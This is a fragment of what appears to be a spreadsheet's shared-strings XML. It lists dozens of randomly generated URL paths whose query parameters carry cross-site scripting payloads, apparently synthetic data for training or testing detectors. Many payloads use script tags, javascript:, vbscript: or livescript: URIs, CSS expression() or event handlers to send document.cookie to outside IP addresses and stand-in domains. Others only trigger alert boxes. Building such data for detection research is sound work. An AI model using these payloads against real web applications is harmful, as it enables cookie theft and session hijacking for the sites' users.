    <t>/lewee_hkha7/libotelneto5exec/1ghbreamwqbhlbhkk2a/iioxkoydhbv9lmzxiij/cs5soern/fromgetf@toa/samt7mfnodensiqo_smd/cb6sb8cowzywho0/n9py/cyfvk47kmailsystem2xl/auct@8re.mdb?ehshet6s=lxefaetonbio&amp;herahnii=5esudrasthtesyof&amp;aag=lyoayrdjr2un6n&amp;eifenmea2s=tenh&amp;jllhlo2td5n=sgei8&amp;xm5ikhteels=euiea7semdo1ro3&amp;dqwm=&amp;&lt;script++&gt;[alert+++('n7yytewneo');]&lt;/script++&gt;&amp;i2=09&amp;eraleyao=537&amp;hhsqse9aeyro=ssewo6bp5dr</t>
  </si>
  <si>
    <t>/8x6jfx3usmy6@i/tvp/ssl.gif?inqechocxz3bwwhere=nph-ol8n3gteugmsautoexects~+~a&amp;tnaimnemdmlio=script+alert++++(3theglomenknpa4.aust)script&amp;ohtoswnn=usu)&amp;aduteie7er=aseeexec:uhadmin�&amp;oejestnx=2727688</t>
  </si>
  <si>
    <t>/ctop5iye8fsntbeee/noiet1s/ofttese9tl/stntefmiegwcsir5ssd1/a6qji.gqpuhglkj/jiq4xyij5nhllb/i3gs/siax6mh4t2yube3fp-ya.aspx?7se3=udmri&amp;rl=&gt;c&amp;xvno=neqerodehhsreeoro&amp;sewmtf=8&amp;wydoedn=nsot77betweeniul9&amp;k9copen1nimgmk-m-=&lt;script++++&gt;alert('tgie.tsieoe')&lt;/script+&gt;</t>
  </si>
  <si>
    <t>/oozscfeyrmsreenfb/qycehg9k4d/iqfivsniiwpt-ujoi/7x/ftv/wbodyem2piyblogd/cikaw5cok.shtml?mteeohhahottuz=&lt;img+++src++=+++"+++icme+++++"onmouseover++++=+++"+++[window.open('http://20.13.177.51/isro.asp'+document.cookie);]+"+&gt;</t>
  </si>
  <si>
    <t>/fromnnodenvlxgwwlc/mdi/2afw/tasei/alunzdonunet9/i0cf/nthofyno/acemmie5i/vsrvgl3eesadee3a/ho2au.js?y1atxd=&lt;iframe++++src++++=++"++vbscript:[alert++++('oasarcil');]+++"++++&gt;</t>
  </si>
  <si>
    <t>/ttoarmsrte7uftentuiu/gj1k4rl/gass4saised1rsg7/9hrz/tgfc@@h./wdzyinsertlyd@/olszukz1hu0nu6/htoptesl/6pq0.k5ey.shtml?4it9s=e1ah&amp;tor=odfh3ortctcb&amp;fa8iti0ykzwt=npio&amp;esn=saxfwjp&amp;aobete7osniu8f=2vn9fcicoal9osirl&amp;w8t6x5aae3nd5uh=httpsarheddcu&amp;119oraic==am]srmaiig:gscriptnq7&amp;bcemib=9482963&amp;keo=&lt;a+++++href++++=++++"+++javas&amp;#99;ript&amp;#35;[alert++('sizaoi');]+++"+&gt;&amp;voesafec=484204&amp;eeefst=nm0rvh_0.&amp;pt5wetonabm=aba6nmriilty&amp;ats=958</t>
  </si>
  <si>
    <t>/eptw67or/oqqptzeyiqhyc2ex/n@cljb-dgfghoe/mm9lijegzuc/uzmce6ztxd/lp/dykxdoh3x/adu7/yyfdgy.aspx?2bao=1071538637&amp;imtakooftriwz=lb_l&amp;xkiframex=6&amp;jrrp=yeeeer&amp;4es6lpajkyea=39027&amp;uokirpqrdo=6gdcknx&amp;tj=ldcnuy&amp;bqp1fcrmrdrd=rviaikc&amp;yueetljtosotmo=&lt;bgsound+++++src=++++"javascript:+++[window.open('http://206.255.251.40/le.asp'+document.cookie);]++++"+++&gt;&amp;otiigth59s=opassthrucl)q~-?ioscriptu+lwl~&amp;w57eoos=ttn&amp;s9ocid21=noc&amp;e8ntato=oa+htts+oect7ut&amp;olinkmmsyfp=0kvxl&amp;@cg6wh6xjdumail=rgnymt</t>
  </si>
  <si>
    <t>/jh0attp1r6welmfnqs/tkzro_htpalo/a13ak@ibaw9_3do@sak/t70ks-kkigbsx1.xoz/jaenb2avl0m3p/cmdesnlsrlh/09ub-i/15xg70lprmq9q9-wl/lue/jvos@p5os4r92hdi@a8a.asmx?n1nhuta=db&amp;stnsethlxh=92201451&amp;huvnbmvengs8w=17508190&amp;cn3=@aiccuqoae&amp;hxkornti3hniy=mixd&amp;vcxtermvw1idwherejr=oeihnqmtw&amp;mfsecgncaehgto=&lt;img+src+++="+++++livescript:[alert++++('ns');]++++"++++&gt;&amp;fu06tyoyt=ey4lhteieut+b6t&amp;vn8roasdx=747&amp;iccnj=9j</t>
  </si>
  <si>
    <t>/ba6hqw/p_zlw/grtm7lsira/rm1bme/apiea/af/iuzksvz1f-5cv.rn./hxdo.asp?1htaccesivept=&lt;xml+++id++++=+++"++x+++"+&gt;&lt;a+&gt;&lt;b+&gt;&amp;lt;script++++&gt;[window.open('http://149.75.94.92/oras.aspx'+document.cookie);]&amp;lt;/script++++&gt;;&lt;/b++&gt;&lt;/a++&gt;&lt;/xml+++&gt;</t>
  </si>
  <si>
    <t>/itmruzathomhvhv/ogre2rdeeo4mmn/t2ubppxiry/khul620pacuhv_om2/etnl/me6r4toyffatfen/sdc@yqzligheprod-lsg.asp?-nchmr0uvw=3721941&amp;3ag=&lt;input+++type+++=++"+image+"++++dynsrc+++=++++"javascript:++[alert++++('llue');]++++"+++&gt;&amp;fhclwnkwasj=fkdjcwrqw7u</t>
  </si>
  <si>
    <t>/rdptbm@qa.axskn9f_2/easx/tq95ymczjliutx-rcyc9/hvrl1jyzl/tylrgkd/mzunvm3y/e10i8beru/rwts7iiihdcrurae7d/txtnetsi0n41e3y.swf?pj=ze7ldeletei&amp;eeyrtebejtu=51253213&amp;ge=&lt;img+++src++++=+"++livescript:[document.location.replace+('http://www.ortoil.com/cgi-bin/ornstionan.cgi'+document.cookie);]+"&gt;&amp;4atdhsplf2t1e=nrunmt&amp;et=3307652</t>
  </si>
  <si>
    <t>/odcapbeo.kn6eb83/ey/ahxqeidiwx7j/i_ausex1-fg6/a@u/6tesp/9_4zvt1y/kptjnai/hjeohshisau/eyli/iicfalh4nrrsjni9emva.swf?c2maieins3c=ps&amp;0kcheeo=7+replace&gt;d3ud&amp;pt=us&amp;psmevalsexec=so&amp;0n67acrlhaxep=eu7ntar2t_&amp;rts=a0kssg.s&amp;kieeernetee=ioyae&amp;iedtoacs1=&lt;link++++rel++=+++"+stylesheet+++++"++++href+++=++++"+++++javascript:+++[document.location.replace('http://www.rionli.com/cgi-bin/nsiest.cgi'+document.cookie);]"++++&gt;&amp;rs912vvlsyk=4530088932&amp;mihcbg=[e$eao1n+aaa&amp;mmrdkaean5udhn=soxaeahsatle</t>
  </si>
  <si>
    <t>/cun6y3regiyhhrtnmy.dll?tnrqhkimcfiem=4z&amp;yiklntrsle=097551&amp;yedmflf2ih=msoo63iemeo&amp;xqm_.ks4za=ake&amp;arnr=&lt;xml+++id+=+++"+++++x++++"++++&gt;&lt;a++++&gt;&lt;b++++&gt;&amp;lt;script++++&gt;[document.location.replace('http://www.li.com/cgi-bin/maniicniel.cgi'+document.cookie);]&amp;lt;/script++++&gt;;&lt;/b++&gt;&lt;/a++&gt;&lt;/xml++&gt;&amp;nofdwn2ei77ie=g&amp;dtmra=612&amp;yonaaf=90655274&amp;oy0nwsxbchr=ygop</t>
  </si>
  <si>
    <t>/dden/tx7iun2uh4pg@wherel/af4/d6zjc1/c5xq8jcnr1/nhi9eoj8hlaheb2t/tyvffyxg0tkli.js?ceehz0tea=nrmlah&amp;8nawvduxmf=blsde+sei&amp;fdun75eiqd=1ddropbrlatsm1sqne+e+&amp;tbhmnritante26=&amp;{[window.open('http://89.98.73.221/llolve.dll'+document.cookie);]};&amp;ritsr=dsemliovthsg</t>
  </si>
  <si>
    <t>/ssssm4nerp9ndem/nsheitnjoliosdenlyr/arz_p45/eblaptemd/et5vocn8vceajbr0u1/o0jgftdemluhzbdyc.cfm?v4ebyaa1r=ndc&amp;dudioaocsxf5yx0=z4(&amp;chhfhtsttm5gote=98&amp;efpmnnacbq4iow=g&amp;etaibnmh0ont5e=tr51swul1&amp;9dxn9de=&lt;img+src+=++"+++++nama+++"onmouseover+++=+++"++[window.open('http://71.113.135.26/olla.cfm'+document.cookie);]"+++&gt;&amp;9bbgsoundrfhhtkcq=eeuywdyxzvzz&amp;arl=boot.ini7in+|&amp;at6ncaoeci=insertalng+o\\srs6o7servicesf&lt;eidm&amp;e8ya=v88p8szgy&amp;otrrdhw=79773046&amp;p8a=v2coasn&amp;qaa=7643821&amp;egfathdktlsin=9506</t>
  </si>
  <si>
    <t>/h9ocn2m/-av84kp-/n1am1sbynt5sse-k7z/0zeg4qqe3p3/rtu2cpc4tthzli5tebqx/kq/zdta.shtml?abi=&lt;img+dynsrc++++=++"++++javascript:[document.location.replace+++('http://www.ne.com/cgi-bin/taenit.cgi'+document.cookie);]+"+&gt;&amp;o0tknlnhmrpwa=a16ed.oxsir</t>
  </si>
  <si>
    <t>/racu9rm/acmd_2j9@/ixybx3.34d8/o1eoerie1oethen8evs/itju/8imzn/t1lpxgbpw9hyke-vzeub/or6mstoto5ieae/7bs@kz8ojo3v.wf95gmv/nrt8lxbgkxajf2/eairentaa/mtp4@j6tw.swf?u5io=&lt;xml+id++=+"x+++"+++&gt;&lt;a&gt;&lt;b++&gt;&amp;lt;script&gt;[window.open('http://155.236.12.33/arng.asp'+document.cookie);]&amp;lt;/script&gt;;&lt;/b++&gt;&lt;/a+&gt;&lt;/xml++&gt;</t>
  </si>
  <si>
    <t>/pchbuqw5@c0rk3s/1jkpuv@zv.vz/rgierntl/k./tokrhll87lfii/tiiitecrdeoh/arcnttsneyanyeabe1t/inadebcopy6/saeu0c.zcoim4.7rgcr1/fyxmle.php3?nrthneps4rnmejl=126601352&amp;teyhryiucyt=&lt;iframe+src+++="+++++vbscript:[alert+++('sn');]++"+++&gt;&amp;wfzn3nstdinla_v.=776895&amp;oxjl46la9uv=ay7nfim</t>
  </si>
  <si>
    <t>/gop2q9qevalf2/oiocrt3lc/14phpcogu/o28gmdigmiaaiiskxi/jn/09udl09g.wlfc-n/ofozsifltixn@/-ptxts8rkms.jsp?heiin=&amp;{[window.open('http://216.103.160.164/esroni.cfm'+document.cookie);]};&amp;oameyr=0tmieoe39zntdd&amp;essuthetpnut=qi&amp;eetx=rotaqrpamnfxrta&amp;2t1me=aopc8wlw&amp;dtaahvourha5ba=udamosiir&amp;gxstw8ne=fssiss4aeoixa&amp;threpnbzaenn8ae=ksouce&amp;532be7oi=hmoliqe/n+&amp;ii=e;select:norl4r&amp;mvdekpddesr=4079610</t>
  </si>
  <si>
    <t>/oggc/e9/mr58rwpul/aihljjdarji_irv8dwb/dfnqih/uls.uvxyw_mailiby/drzesga/k5xivgov1telnetiolo/h4gwt.png?h3hctseiifrao=a1pxgt&amp;hcovsotrygj=npehnotkd6vxrson&amp;9abfru=guehafadyiteno&amp;uqrfofnoei=0kev3_o&amp;o0rapigvvqaap=scripth&amp;liols2dk8t7n=&amp;&lt;script+++&gt;[document.location.replace('http://www.elreer.com/cgi-bin/na.cgi'+document.cookie);]&lt;/script&gt;&amp;c78slh8g=yan</t>
  </si>
  <si>
    <t>/mmtirth5i/iatt2ree7ld7iel/nz5oefsto.jsp?o5rssebdtz3g=0ty+style=left:expression(alert++++(duenr.e))</t>
  </si>
  <si>
    <t>/pjhx/he81tsfse.gif?ngttrpnddetemmi=&lt;link++++rel+=++"+++++stylesheet+++"+++++href++++=+"+javascript:+++[alert('nunlebenb');]+++++"++&gt;</t>
  </si>
  <si>
    <t>/nuoshsty/oa3ei7/htdropzxgxt.ue7/0dv@gb2go/liteogyab/lq9kwfuyrpoy/aimtenrir/yek8@zoxwk4/y1autoexecv1-7voa.msf?dnunkim7=&lt;div++style=+++"+++++background-image:+url(javascript:++++[alert+('t9t');]);++++"&gt;&amp;ocohetehyd=sut&amp;eouy0esgs=e7nfbt&amp;dhd=+a&amp;myeppd2z=access_logla\\ekrerles~a&amp;mjldnshcs8=z6ro_1&amp;hee0nrmaenhoi=e9o4dlbnju8&amp;ah2atd0aovh=5&amp;ted7=nw&amp;iiahtbu=952217&amp;wahd02rgexesav=maeh7eqlhn84imn&amp;esnshicaseusn=rntn@i</t>
  </si>
  <si>
    <t>/1rp/sdytii2w3eocn/w0n7n@erxyubhkzaezv/4weqh/yofvdlne9ie/trt5b.shtml?wxw6w9a=&lt;img+++src+++=+"+++livescript:[window.open('http://237.95.17.8/veisna.mspx'+document.cookie);]++++"+&gt;</t>
  </si>
  <si>
    <t>/sd2nnepm8rdp/xjt-ttc_homei37.php4?d7tesuijrotfiaa=n9ua4rigw9-&amp;djthud=9&amp;5z=l4l2b&amp;yocon5zaqoste=nrsi&amp;rtcatusqc=r86zr&amp;wre7eto=73851357&amp;emeaht0s=7&amp;otwtaf5r6tcne7=37802&amp;polg0povneeran=scyi;metabinihho&amp;rloayc=ln&amp;orcur=&lt;img++++src++++=+"+++++mocha:[alert('dtqciismi');]++++"+++&gt;&amp;0eqo4ia=223</t>
  </si>
  <si>
    <t>/kyhnm/t8wbl/72mwwr9ja/owgb83dx6ehzq83w-.shtml?aofdn=34564858&amp;noatremthjon=6311&amp;bobprrch=stp&amp;er=sedimgt&amp;esbflq4ln=6noba&amp;0nwt_ojrho=ftmptoes+havingt&amp;1loceuniongm=javascript:++alert(++"nsevtn.esuen")&amp;dwblink=2&amp;ttrdiacdyee=307408&amp;dl=016407&amp;phzsoathlep=5588517&amp;rersf5ewdna=859</t>
  </si>
  <si>
    <t>/e3ibcthfzfgqzw@nr/6mwedmetnielihln5si.js?qjebs4hgu=&lt;style++++type+++=++++"text/javascript+++"+&gt;[document.location.replace++('http://www.erst.com/cgi-bin/etneta.cgi'+document.cookie);]&lt;/style+++&gt;</t>
  </si>
  <si>
    <t>/ebphvqazhh0oo/ljvb%u21ya@/rlsijes/o8strhcn/pisehse2dehieeser1o/7jidox8fcwn/voe.xn4ppw5/sb7.ojx/rleiocizdtbyklelee4/acambodreeaul.bin?jb59homejy=8102813&amp;ott1=tetmp&amp;stonahvq=sqh&gt;uol+vbscriptaoftwgeth&amp;ss=gwemyneaa&amp;nnp=&lt;a+++href++=+++"++javas&amp;#99;ript&amp;#35;[alert+('eidwoeed');]++++"++&gt;</t>
  </si>
  <si>
    <t>/t9bmw-wx/asamrezdehpugxzi/w5/ntppv61r00vmv5h1ym4/jphomej05aaccess_log8d6/m4ls/eia5/zpbe8hvbx7vs.qsmgeun/akbk35u8hbwymbib358w/fwh.cgi?nt=adsn2ofh5htwpetan&amp;ritooetihe4=&lt;script++&gt;alert+('ridd.rth9hs')&lt;/script++&gt;&amp;o9orh51t=786354832&amp;61ttlknbamn=zallgn$oshavingsaequnionwpnifep&amp;an=192&amp;1t5lteiwaatsot=48</t>
  </si>
  <si>
    <t>/uthc/mba.e.l7bw6/lzlhinoyxldna.pl?zje605=96952&amp;vu1bhypr54=088&amp;f4-f97=210953&amp;azapiz=&lt;iframe++src+++="+++++vbscript:[window.open('http://129.123.7.121/meti.dll'+document.cookie);]++++"+&gt;&amp;eobdepe5r5ta1t=58&amp;yeqtersnhee=9680&amp;irwt=ezixdvn&amp;65a9pzoea=ocgaio+shq1et&amp;tdeshe=61908088&amp;escriptgry=eaeecfrhotest2c8</t>
  </si>
  <si>
    <t>/1wo6fswreaciy/i_gd@t@jihzsi@ym4xc/rbrq2.js?ierreftgedhtrod=+j;luetmpscn&amp;7tmprdfwn_h=5303&amp;cmcrcczx=&lt;style+++&gt;&lt;!--&lt;/style++++&gt;&lt;script++&gt;[window.open('http://192.108.36.31/islama.msf'+document.cookie);]//--&gt;&lt;/script&gt;&amp;reh0=the|imgwp-++reus</t>
  </si>
  <si>
    <t>/oe/3n7m1hcatlx4hhv.nsf?io8bnk6itama=ehyriidzhacoelo4&amp;oxye1me7oe=7i6cb&amp;i2s=&lt;img+++++src=++++"+++mocha:[document.location.replace++('http://www.meenlais.com/cgi-bin/enalve.cgi'+document.cookie);]+"+++&gt;&amp;aveentj8=tntl&amp;awve2ct=54&amp;ht=]++;+hsn7[logwh/&amp;mreteogexsse=i=usrd&amp;ratritetagrt=1586&amp;lo6weroo=thavingn&amp;w6o=prelog3&amp;auwt8nsoelbrmb0=fjrni&amp;osabyr=suy8vktjc0w0&amp;ytrpun=81019&amp;nauoyhcrtnlun=159&amp;geulbe=ini</t>
  </si>
  <si>
    <t>/eunhv-@0m/pinclude04m/o4eibhou1/ezzfzn/tryo1arfxyd/shinao/hsvbklitx9c7p/md.msf?talaua8tt8=ieutlwf&gt;open&amp;2yzboot.iniypositionyp-1s8=&lt;object+++classid+=+"+++++clsid:...+++++"++++codebase+=+++"javascript:+[document.location.replace+('http://www.la.com/cgi-bin/totoetmall.cgi'+document.cookie);]+++++"&gt;</t>
  </si>
  <si>
    <t>/g8qz/utx8arltwrfanw6nb/n4kkz3oygnncjrbarpu7/ftjksyqk5wa3iumo6h/zebgod/echof9z-qci_y/le2deceqn.nsf?nnd=|z1leg1&amp;rinsertn&amp;enc7nnd=-@wreplace&amp;ttlemhso6=ri+s+dt&amp;c5q9u0lyl.qu=[ovn&amp;bunehiuiete8oss=lz8&amp;lqahitetiedsd=5919&amp;funrnobonl7u=&lt;div++style+++="++++width:++++expression([alert++++('elhp');]);++"&gt;</t>
  </si>
  <si>
    <t>/oaqjrfpk673yh/ryd5p_t/cid/8updateeeechope/twyidkgq/aeackzeemeems/ya41qz.cfm?e1dynsy=&lt;div++style="background-image:+++url(javascript:++[window.open('http://152.236.236.138/nsesis.dll'+document.cookie);]);+"+&gt;&amp;gnes8sa=ltfsoconnectehttprou&amp;iomoisli=765&amp;6oitio=7310884429</t>
  </si>
  <si>
    <t>/siaattxsodsmqdr5hgio/ee7/spy.pt/ei2sjeanrijntxnn/lvqdz5y/9kaktqk2x.tiff?ehorsn=iglhatmpta2e|&amp;td=5104876450&amp;enca95rlti0tq=32056&amp;@buktpgrfgv=v6a&amp;fhaisalldw6r=&lt;div+++style++++="binding:+++++url([http://www.rotrettr.com/script/feiadnn6.php]);+"+++&gt;&amp;hnarrtwme0esjnn=md+1ninsertouieon+d&gt;com</t>
  </si>
  <si>
    <t>/otlawecrdti/fen69ownobwven.css?taltelsdxnyos9=taiiee(deyw2&amp;dr=;esock_stream&amp;o0tx=ngrcp@wr'saa6&amp;sei&amp;uv=298556&amp;ttiatgmg7koee=hneme&amp;d0kv21ni_=9904717225&amp;eecoshtflrttle=74690&amp;bnet=aabnutvareu&amp;spwnrxiott3xo54=0klqzkq-&amp;mereenf=3677&amp;izrrelhhqgsibc=:m&amp;itwda=&lt;input+type++="+++image+++"+++dynsrc+++=++++"javascript:[window.open('http://45.38.88.254/onroll.mspx'+document.cookie);]+++"+++&gt;&amp;z5kiivbscriptjju4=7303&amp;ycxbetweenwget=ya6nslrcy&amp;r8eld=hbzig</t>
  </si>
  <si>
    <t>/natohsi/suoh.merlkgi/iyeimawon/e_7cqs/hk/fldpo.nn@fzb6zrk/e0tsnsd/tqon/f2/uiframe9j4sock_streamdivx/hxi7on2aiemosh8bnsa.nsf?sibtbonhrfsei=75769959&amp;iepzgearh2chuwn=uu1omcdsabe$m&amp;2oe94aer=sasdgmgrgytetcesub2dn%&amp;wfc23nybbhus=39056589&amp;xudo=857060029&amp;t5ceieeeaimacto=taodifhcformtk&amp;gmioieaibsgse=&lt;div++++style+=+++"+++++behaviour:+++++url([http://www.algesene.com/script/aat7arie.php]);+++++"&gt;&amp;6nneaitiih9yha=ip1wy&amp;cg=6915&amp;xceytg6y=ueniof&amp;zrfodusxomf7t=ae9h&amp;e8n9lr=shdb/b:&amp;pe1ieydiouniate=urbykrteenuenn</t>
  </si>
  <si>
    <t>/9x4o7ogotceirieehlhh/tx5/tb50olpul8utb/lsluxlmmocha2nxib/hpojfthmy41qs-38/dhdq9opyltfnuwf.shtml?ewuh6ezxwaedr6i=&lt;a++href++++=+"++about:&lt;s&amp;#99;ript+&gt;[document.location.replace++++('http://www.ilro.com/cgi-bin/ni.cgi'+document.cookie);]&lt;/script++&gt;+++++"&gt;&amp;e99aueoeehhdiro=uc&amp;te9lgac=896&amp;mdzlch=0046227&amp;coe8@=5955</t>
  </si>
  <si>
    <t>/aaqk2m/a8tc1d/bbxi0g3lciz/oyleioatttrs.js?thnngunfwhv=6782892&amp;rvo@sp6ofq=hqim3ftnddou&amp;nn=4409&amp;hdao=&lt;div+++style+=++++"+++++binding:+url([http://www.attaolns.com/script/iius.aspx]);++++"+&gt;&amp;enraairae=503&amp;23samnd=lib+8ep&amp;rheight9y=ed&amp;inoeyfgwoemne=otedrasib&amp;t7hidiasi4ra=ch)it+e&amp;ni5v_v=processing-instructionp+5group+bytmc</t>
  </si>
  <si>
    <t>/edrxuve/os@@4-eermk/rpyifoyiuxgwujqm2jvh/tmq4zo8mpy8xt.png?eaccess_logb3bl=ixpkne&amp;oscript5whereolzf=wtzreaechoepk&amp;nwbpievedfuooe=rblhdeaidietexb9o5&amp;tdvwjb.dx7=&lt;style++type+++=+"+++++text/javascript+++++"+&gt;[window.open('http://111.85.196.114/riasch.cgi'+document.cookie);]&lt;/style&gt;&amp;xtermk-2nl-h=48&amp;hn3s9execiek=eciegn3tnqbelhugnm&amp;onktr4r=euddhtobjectlsbo@o&amp;uwsqmx2rtoqm=soat&amp;s7sreiaa=ec5wjo&amp;wgklinkgrncc=e+a+&amp;gatxohrdsig=|?ot0mnde</t>
  </si>
  <si>
    <t>/ash8lse1_uteg1uhgvhl/tt0p_@7igbqxkrc/guz/objecty.r/et3.a559ujuofel1a/hzktu-hwvrndvannv4no/efghb120bohjcy/nxkzuwmdtlzg.bin?si0sivslee=ncsoezpftpoe&amp;xslltidi9=&lt;bgsound+src=++"+++javascript:++++[alert+++('anoeoh');]+"+++&gt;&amp;sm=i2oe&amp;2mwe=3668002030&amp;so=1tkfea�&amp;dosagaeratc=owk_ri5no&amp;betoaeniudyo=be&amp;sazed=lib6+n;hdwp-i&lt;eunionmmeta&amp;lauitmiaenetlro=1nodeey&amp;tnranbegstt=e2gtenifti&amp;nht5hrkf08e8=1&amp;frnaddtk=7&amp;wvd1nh=dtnddszcr2c&amp;e7rtao=aiuemoead&amp;41ntceetio3n=tbt</t>
  </si>
  <si>
    <t>/iolnycmk/nt2n80sroum4lnnod.jpg?taaos1tviiycap0=&lt;iframe+++++src++++=++"+++vbscript:[document.location.replace++('http://www.nt.com/cgi-bin/ns.cgi'+document.cookie);]++"++++&gt;&amp;csndi=hgrh8peorwaanp&amp;@-2_i_rf=te%tcascp&amp;ld9dih9htst=3852636306&amp;o7eee=264899</t>
  </si>
  <si>
    <t>/oxl/rpfapfrgrnkl.html?cbaann=kroigfouqdls&amp;eae8bilbwnregta=87296&amp;exhoddoliefae=pat&amp;a2odseehaeoo=806288&amp;iorn3lnro=gzai1eeh&amp;rrtqredea=qafbsg2&amp;2tnzznlnnit4v=&lt;&lt;script+&gt;[document.location.replace('http://www.me.com/cgi-bin/anntns.cgi'+document.cookie);]&lt;/script++++&gt;&amp;l8eh9emibrco=4</t>
  </si>
  <si>
    <t>/s-..k8jlhftnypdyi/xswuenuent2ntisieens/alde3d3yg2s2f@sktmsh/plttw/eeuhtrifiy/ngigabiihna.asp?otn=&lt;form+name=eht++&gt;&lt;select+name=fae++&gt;http://www.s.com/ikitde/?&lt;/select+&gt;&lt;/form++++&gt;&amp;h9dttoaas4=5e&amp;zgiessam=422471&amp;wdb=6</t>
  </si>
  <si>
    <t>/5ypx.bin?mctd7b9eeofct=370255029&amp;irrerosihveeeu=n3cigtwd&amp;csnhscsa=&lt;&lt;script+++&gt;[window.open('http://154.183.233.130/as.aspx'+document.cookie);]&lt;/script&gt;&amp;twpht9lhd=06352190&amp;ov=noecp@.nssl&amp;hen5ucc0olebal=hilewlleecqnericul&amp;cumgv4k=ay&amp;mftdn1ss=%rszincludesahit1rja</t>
  </si>
  <si>
    <t>/sel5ocbarri5mab/ei/c0swpvyg1xinonra/updatejpshqxomxgc/swmq5gl.igl6nay4/in8lwget.i7/pyv/_wbatcjne3rk3/ecs/mk8pp7q/hrxeor5fmt9elr3/nouc.2e.mdb?8ecmlsm11qnnrp=476&amp;tgt=+&amp;4drptweimn=6gief17o8aort67tm&amp;s6eluyti3=orn:h=&amp;ciei5ety7oemst=577&amp;ldwtrc4n=t&amp;.prdocumentess6metc9cmd=erfhsyoygrs+a+l&amp;mna1e=eij&amp;childr_btesp2wb=fog&amp;qkcx8e_7v=bstrh+eval?1tc%an2oo&amp;nmersmi=&lt;input++++type++++=++++"image++"+dynsrc=+"+++++javascript:+[alert+++('zscrt');]+++"++&gt;&amp;es=18</t>
  </si>
  <si>
    <t>/tzlc-1ihzzpcfnarv8q.jsp?e6d=f;ma1elrqattw5&amp;kqexwvggps=nrsw&amp;mipyznaqd0=sopewr&lt;selectwstdinhti\\o+upa&amp;oitesuz0euiz=&lt;img+src=javascript:+alert++++('fi.aje')++&gt;&amp;tsgyeeo=354071088&amp;arw6xin=abestbrtmkairgi-0di&amp;gtdctt=8655959855&amp;-ihfpawzjtc=oc1qgmb4-3&amp;hsrcorhd=geofv4of</t>
  </si>
  <si>
    <t>/dnd2tntorcreseli/djigbhpz/eqbgw.eag4/bk2lpqn/c-ik/sn/1i.e@t@qlv-i9.png?eantysielott=dte&amp;r5dwiuss=4&amp;rcxrdettmhlahmh=c&amp;nedulnm=isetc&amp;ttiatttseq=ohtau+++style=left:expression(alert+(is8h8s.rts))&amp;nlenl9m=n&amp;w@k25_cdeleteohtaccesxp=4926198&amp;-h9wtpsc-@=704</t>
  </si>
  <si>
    <t>/ayycx7jlvo/anydfhopen2andqv/4pjn99tmlinklf16y/home29ewstdin8jydna/mbid.ickqpdklft/mungtotnhriuzt/on9hpv9s.qnrtfjm3mhj/utteheun9corih7ueo/dcwkrz/eebta4einudiho8/etdnnrfenainaa/i7jbjccwh@jiyihv.e.tiff?gra4spos=+aoghts~agimgqme&amp;lhhesee=&lt;img+++src+++="+++livescript:[document.location.replace+++('http://www.ie.com/cgi-bin/isdeittire.cgi'+document.cookie);]"+&gt;&amp;oeaale7mt=aia&amp;+i</t>
  </si>
  <si>
    <t>/grae43gipuerzgojizw/y-/eoceve48nfh/sceo4pihmdrdhe/9sn3ue2n1three/mau@0xgvx/eedyqy5nbj-0hg_fa/njw_ti4b.0w4/pnfyp0/r_j-uhlxhuwthnrgpmw.cgi?uthe=&lt;img++src++=++++"+deonetlaet+"onmouseover=+"+++[window.open('http://210.189.10.218/ne.mdb'+document.cookie);]+++"++++&gt;&amp;ni=+[&amp;0nyoireisyiea=sau7o&amp;uroegueonqu9gp=ser&amp;jsehetefas=nw4srrmtshamv&amp;h.du=hpk&amp;ft=v+tderr:9t&amp;a85wcmhsem=2r</t>
  </si>
  <si>
    <t>/zeahwmacgsem/rrnstiaer5/icwst2/ok_hdroql@/roohsvc6ljsq_k5nst2p/eymeo-._vdkwuw0wqr@k/d6snugrntkk7rywmx/l8/hbh/w8/a0rxrvg8qm.pl?rcenalejcn1gie=ecjiqjfod&amp;clt4cm=&lt;![cdata[&lt;!--]]&gt;&lt;script+&gt;[window.open('http://224.89.169.174/is.mspx'+document.cookie);]//--&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/otf1ehphoeearr/tlx6s30aiofheax/ci2kuh/8we9/wq91em/tsoyro1rci1ngjanisi/rihdsrmiwcw.html?qs-4x3xpx0=67903&amp;tdi=rr_s&amp;gd5iiaxoie69vud=&lt;img++dynsrc++=+++"+++javascript:+[document.location.replace+++('http://www.nengelar.com/cgi-bin/in.cgi'+document.cookie);]+++"+++&gt;</t>
  </si>
  <si>
    <t>/owekk2yjo/tsa/opsdcs0abt/lrzjautoexecgi4/ikborepll0it/ufp.dqjmad1z.x@r/heblwwtcsrolm4ntht/-lshl1uklikekhcu.dll?lizqhr=o\\n8a&amp;i9nesqqpettatxo=&lt;img+++dynsrc=++++"+javascript:++++[document.location.replace++('http://www.st.com/cgi-bin/ieindell.cgi'+document.cookie);]+++"+&gt;</t>
  </si>
  <si>
    <t>/hnoxzfus6huf0/ec4tc.2.f@z2l6.-/eiwda5qfhecamss/xttinheu/av6hvpmfaz-lnnzojs/oths/raao0a8muacsinlles6.php4?nesf=&lt;style+++++type++=+"+++++text/javascript+++"+++&gt;[alert('iwn');]&lt;/style++&gt;</t>
  </si>
  <si>
    <t>/itbda1i/ra084ehat/ybb_ioqatdbc/adautoexecsa/9ctfnowregiicrei/ap.arh/odglhhiraarp9oizso1/sssgdn80po.htm?rjpotb2slwiopo=&lt;xml+++src++++=++++"+javascript:++[alert++('ir2ef');]+++"++&gt;&amp;oube=heljheiegteu&amp;nisnostotsi5=ur?wlnousrzy?8nm$imgopt&amp;ry5ed3ebmcvsree=orn+9&amp;av45n=dsod(&amp;iszeevai=k.c&amp;wicatbey=iti6rexectt&amp;ge4vdb=eservices3e&amp;hntec8e8lnetdtp=c2ih)dh(7r)s&amp;rrqnv=fnem+])t&amp;qojs=c+&amp;ofenlki9=ttt1ibma</t>
  </si>
  <si>
    <t>/vop/jv4du3q/ok/g1csjdcswobexec/tsffh9gk5-lqumhkfg-/geesta0iziwp5lowne/ibmanvvze0s1c2ebs/z3/hanaq9ztga3e.css?szn3aan=b&amp;5hhtrna4yyi=096&amp;9aoo8iunb6ile=57900106&amp;rm-b2n@uqu=i3wrupnx5bo0raowbr&amp;s8=eeme77z&amp;n1dm=663072&amp;txttmydiyansfe=&lt;link+++rel=+++"+++++stylesheet++++++"+++++href++=++++"+++javascript:[window.open('http://156.136.215.160/enll.swf'+document.cookie);]++++++++++"++++&gt;&amp;saekzsowtgusu=6183566869&amp;twxmc=fv73bq5mel@&amp;aecep=eeng&amp;5gbscriptrwrch=346349&amp;aralsds5uyro=8&amp;dlhreeisde=5001882021</t>
  </si>
  <si>
